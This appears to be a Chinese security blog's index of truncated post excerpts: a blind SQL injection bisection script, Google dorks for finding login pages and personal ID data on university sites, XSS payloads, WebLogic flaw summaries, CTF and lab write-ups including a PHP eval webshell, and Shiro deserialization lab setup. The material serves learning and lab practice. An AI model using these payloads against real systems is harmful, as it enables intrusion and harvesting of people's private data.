SQL注入之二分法
常用单个布尔盲注二分法import requestsurl = "http://xxx?id=1' and 1="flag = ""for i in range(1,100): low = 32 high = 128 while low < high: mid = (low + high)//2 #找到中值 content = "select password from ctfshow_user4 limit 24,1" sql = f"if(ascii(substr(({content}),{i},1))<{mid},1,0)--+" url2 = url+sql r = requests.get(url2) if "admin" in r.text: high = mid ...
关于信息搜集
信息收集很重要!如确定资产,比如有哪些域名、子域名、C 段、旁站、系统、微信小程序或者公众号,确定好站点或者目标系统之后,就是常规的指纹识别,像中间件、网站,扫目录,后台,确定功能然后分析每个功能点上会有哪些漏洞,就比如一个登录页面,我们可以考虑的是爆破账号密码,社工账号密码,SQL 注入,XSS 漏洞,逻辑漏洞绕过等。
常见hacking语法在挖edusrc的时候遇见最大的问题就是如何突破一站式服务大厅的网站,要突破这一点,就需要拥有教师的工号、身份证和学生的身份证、学号这些个人隐私信息,所以我们就需要做好信息收集。一些常见的Google语法有
1.site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system2.site:域名 inurl:login|admin|manage|manager|admin_login|login_admin|system3.site:域名 intext:"手册"4.site:域名 intext:"忘记密码"5.site:域名 intext:& ...
xss常用payload
第一类:Script 标签<script src="http://baidu.com"></script><script>Function(atob('YWxlcnQoInhzcyIp'))()</script><script>alert("XSS")</script><scr<script>ipt>alert("XSS")</scr<script>ipt><SCRIPT>a=/XSS/ alert(a.source)</SCRIPT><script>alert(/1/.source)</script><script>alert(1);</script><script>prompt(1);</script><script>confirm(1);</script><s ...
web框架及中间件、组件漏洞
weblogic简介WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
默认端口是7001
Weblogic弱口令/文件读取漏洞漏洞原理这里有两个漏洞。
弱口令漏洞原理是因为在搭建好Weblogic后没有修改后台的默认密码或者密码设置太简单,导致存在弱口令登录,获取服务器管理员权限。
文件读取漏洞是因为对用户输入内容没有进行限制与过滤,导致可以读取任意文件。
Weblogic未授权远程命令执行漏洞漏洞原理允许未授权的用户绕过管理控制台的权限验证访问后台,进入后台后,又允许任意用户通过HTTP协议执行任意命令。
影响版本10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
Weblogic SSRF漏洞漏洞原理Weblogi ...
渗透测试
0x00 什么是渗透测试渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!
渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。
渗透测试分为 白盒测试 和 黑盒测试
白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析
黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透
渗透测试流程
0x01 用户授权&确定目标在渗透测试之前,我们首先要拿到用户授权。在没有授权的情况下,我们是无法对客户网络资产进行任何的攻击行为的。
授权书应写明授权日期,授权渗透目标,双方责任信息,并加盖双方公章,一式两份,甲乙双方各执一份,模板如下:
当我们拿到用户授权,渗透目标也明确了之后,就可以开始正式的渗透测试了。
0x02 信息收集信息收集对于渗透测试前期来说是非常重要的,因为只有我们掌握了目 ...
逻辑漏洞靶场环境——logic
实验要求漏洞环境:逻辑漏洞靶场环境——logic要求提交实验报告1.突破功能限制漏洞。要求突破查询按钮disable限制,获取编号:110010的查询内容(弹框中的flag)。2.用户信息泄漏漏洞。通过回显信息,以暴力破解方式猜测系统中存在的两个用户名(提示:用户名以 “u” 开头),并暴力破解这两个用户对应的密码。3.越权漏洞。通过上一步破解的用户名密码登录,利用越权漏洞获取admin与admin1的个人信息。4.遍历漏洞。已知当前系统中存在的一个学号为:20190504035XA01。利用遍历漏洞获取其他学号对应的成绩(不少于5条)。5.暴力破解攻击。获取系统中另一个六位数字编号对应的弹框flag内容。
靶场搭建进入靶场文件目录下输入docker-compose up -d启动靶场,访问http://192.168.37.128:8993即可
漏洞复现突破功能限制漏洞查询按钮是灰色的,无法被点击
按F12进入查看器,定位到按钮的前端功能实现,将disable="disable"删除后点击查询
弹窗获得FLAG:flag{byp4ss1s_ez ...
NewStar2023-Web-Week1
泄露的秘密
提示:粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!
访问/robot.txt,获得第一部分flag
另一部分是www.zip,下载解压得到index.php
<?php$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";echo "<h1>粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!</h1>";
FLAG:flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}
Begin of Upload绕过客户端 JavaScript检验,上传一句话木马burpsuite修改文件名后缀即可
//一句话木马内容<?php @eval($_POST['cmd']);?>
蚁剑连接,得到FLAG
Begin of HTTP前面的都非常简单,类似这种,根据题目提示修改请求头参数就行
来到最后一步
第一时间想到改X-Forw ...
前端漏洞靶场环境——front
实验要求漏洞环境:前端漏洞靶场环境——front(系统有两个用户: user1/user1 、admin1/admin1),要求提交实验报告
挖掘环境中的反射型XSS漏洞,(以弹框 test13 证明)
复现环境中的CSRF漏洞,设计表单,当管理员点击URL以后自动将自己的密码重置为:123456
复现环境中JSON Hijacking漏洞,在另一个网站(或本机另一个端口)获取用户信息
通过在服务器Web目录创建.htaccess文件,控制服务器响应头,实现CORS漏洞,在另一网站,接收HTML接口的用户信息。
挖掘环境中的URL跳转漏洞,构造请求,跳转到重邮官网
靶场搭建进入靶场文件目录下输入docker-compose up -d启动靶场,访问http://192.168.37.128:8983即可
漏洞挖掘与复现反射型XSS漏洞使用用户名user1与密码user1登录
查看网站源码,发现参数name处可能存在XSS漏洞
尝试构造PoC并发送,成功弹窗,证明存在反射型XSS漏洞
http://192.168.37.128:8983/front/info.p ...
记一次vimwiki安装及vim markDown的使用
写这篇博客的缘由是我的Linux操作系统的老师布置的一项作业
vimwiki安装这个是vimwiki的官方文档:vimwiki/vimwiki: Personal Wiki for Vim (github.com)
我采用的是Vim packages安装,查看官方文档↓
vimsrc配置查看一下vim的版本
终端输入vim -v即可查看,我的版本是9.0.1378
确认版本符合要求后要将vim的配置文件vimrc修改,我的vimrc文件在/etc/vim/vimrc,管理员权限输入
vi /etc/vim/vimrc
将这三个配置修改成如下图
下载vimwiki在终端输入:
# 下载vimwikigit clone https://github.com/vimwiki/vimwiki.git ~/.vim/pack/plugins/start/vimwiki# to generate documentation i.e. ':h vimwiki'vim -c 'helptags ~/.vim/pack/plugins/start/ ...
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
实验要求漏洞环境:Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
复现环境中的反序列化漏洞,截图证明
尝试利用漏洞执行系统命令,列出/etc目录的文件结构,提供截图
靶场搭建执行如下命令启动一个使用了Apache Shiro 1.2.4的Web服务:
docker compose up -d
服务启动后,访问http://your-ip:8080可使用admin:vulhub进行登录。
产生原因shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。
实际上漏洞与shiro版本无关, 无论是否升级shiro到1.2.5及以上, 如果shiro的rememberMe功能的AES密钥被泄露, 就会导致反序列化漏洞. 本人已在实际工作中遇到这样的特例, 密钥泄漏的根本原因是开发人员在开发过程中部分代码直接使用了网上的 ...